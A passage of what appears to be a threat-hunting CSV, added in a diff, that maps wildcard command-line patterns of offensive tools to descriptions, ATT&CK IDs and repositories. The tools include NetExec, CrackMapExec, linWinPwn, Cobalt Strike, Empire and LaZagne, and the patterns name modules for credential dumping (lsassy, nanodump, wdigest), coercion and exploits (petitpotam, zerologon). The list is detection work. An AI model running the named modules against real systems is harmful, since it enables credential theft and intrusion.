- T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -m lagentcmd *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash 
script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m olecmd -o *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m rdrleakdiag -M masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"* -m run_command -c *.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m SimpleHTTPServer *","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 
- T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m venv csexec *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* malleable-c2-randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -mdns y -mdnsunicast n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* memreader.c *","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"* MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
